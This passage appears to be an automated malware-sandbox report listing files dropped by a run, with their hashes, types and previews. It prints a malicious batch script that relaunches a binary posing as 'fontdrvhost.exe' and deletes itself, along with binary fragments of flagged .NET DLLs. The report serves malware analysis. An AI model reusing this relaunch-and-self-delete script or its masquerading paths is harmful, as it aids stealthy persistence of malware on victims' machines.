                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\BQS1omMoER

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\EwZcSaKyVq

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\GxxkeYPkal

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.213660689688185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:1RIOmaBZRcz:vIOmaiz
                                                                                                                  MD5:B5D59A733F427DFD771E95CCF4F53776
                                                                                                                  SHA1:16FCC0C500891F9E08CF4EB4BD8C41C858127ED7
                                                                                                                  SHA-256:F7F3AABFACCC42AA66F713F7CBEE8F8D22E59672D39FCC5E9D3022D60BA5B9B4
                                                                                                                  SHA-512:6161970137A3E289EB554BAAEF8FCAB82A7B0C6266B10069BBFC1133123339F411EB8F4984BCE626BAACE1D7668FCF26433B46E4A020246865E285DAAD777645
                                                                                                                  Malicious:false
                                                                                                                  Preview:I1gwbMGLOmCBfcd9ymyLtyvDd

                                                                                                                  C:\Users\user\AppData\Local\Temp\J2KyX56Rcf

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.483856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HjUB7UBZQn:DUB7UBZQ
                                                                                                                  MD5:061CCB94B797D39887F1B4C2FDAFCB12
                                                                                                                  SHA1:E737ED4B6C5C43CF060EB3525F5BECE1876188F7
                                                                                                                  SHA-256:BD5F71303CE342D8E83C88D39786331B9651A8190072F63441BBBBBC2FDB4BBB
                                                                                                                  SHA-512:25218934648290F7583AB3B90AFBADFE50456830373E1AC56059F483810741996EA08038EBB7C9F4D72682B5EE2116238BC4F05EC78748D2CB5CA8B0B6B0D8EF
                                                                                                                  Malicious:false
                                                                                                                  Preview:u7FRysAelVWl7rBHSqY5iTI69

                                                                                                                  C:\Users\user\AppData\Local\Temp\NQQkWS77oU

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\Oxa239DNSu

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\PcelLUrJfI

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\TN0CzsS2Vz

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\V9LTlm1A6n

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14
                                                                                                                  Entropy (8bit):3.378783493486176
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                                                  MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                                                  SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                                                  SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                                                  SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"Surveys":{}}

                                                                                                                  C:\Users\user\AppData\Local\Temp\VHGrIJe2oz

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\dfGSKkZRCQ

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):196608
                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\e7yBZipER6

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):51200
                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\i4dwQmQ2h6

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\l9gqgrl2Sp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\q1nFWhqyfa

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):159744
                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):157
                                                                                                                  Entropy (8bit):5.107669353081284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m3zX+DoDWCSBktKcKZG1N+E2J5xAIQQdgtgh:hCRLuVFOOr+DEDuUDGKOZG1N723fIe
                                                                                                                  MD5:BC3B29D8A0640ED02B2DA0A5FEDB5755
                                                                                                                  SHA1:3A49DAC28150D14879E95D06505ACE4DC7C3004B
                                                                                                                  SHA-256:869E7F7E16DD2809B5BA0D91030E46275A6261CCE6348FD6AB0B9F6A87682B23
                                                                                                                  SHA-512:F2AA8CCCEDEF17237A54ECC2217F2C251F6866B4CF9FE9C5B9887DA5E589C10BD3DB940A10640BAFE94F06A15CB7E02E6077F926374A002952DC4A89B28F4851
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Drivers\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vK5Z1luEHZ.bat"

                                                                                                                  C:\Users\user\AppData\Local\Temp\yMxl40p9wV

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):196608
                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\BoUXaXGR.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                  C:\Users\user\Desktop\JRcNKQWy.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\LtQnCbUd.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                  C:\Users\user\Desktop\OwXMDaSq.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
